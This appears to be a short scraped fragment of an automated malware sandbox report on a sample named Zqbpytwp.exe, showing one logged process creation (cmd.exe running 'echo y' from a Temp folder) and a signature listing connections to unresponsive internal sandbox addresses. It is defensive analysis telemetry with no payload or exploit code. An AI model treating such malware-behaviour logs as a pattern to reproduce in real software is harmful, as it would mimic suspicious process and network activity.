CreateProcessInternalW July 27, 2023, 11:44 a.m.	thread_identifier: 2116 thread_handle: 0x00000090 process_identifier: 2632 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (8 events)

dead_host	192.168.56.103:49299
dead_host	192.168.56.1:139
dead_host	192.168.56.1:445
dead_host	192.168.56.1:135
dead_host	192.168.56.103:49301
dead_host	192.168.56.103:49298
dead_host	192.168.56.103:49302
dead_host	192.168.56.103:49297

Zqbpytwp.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All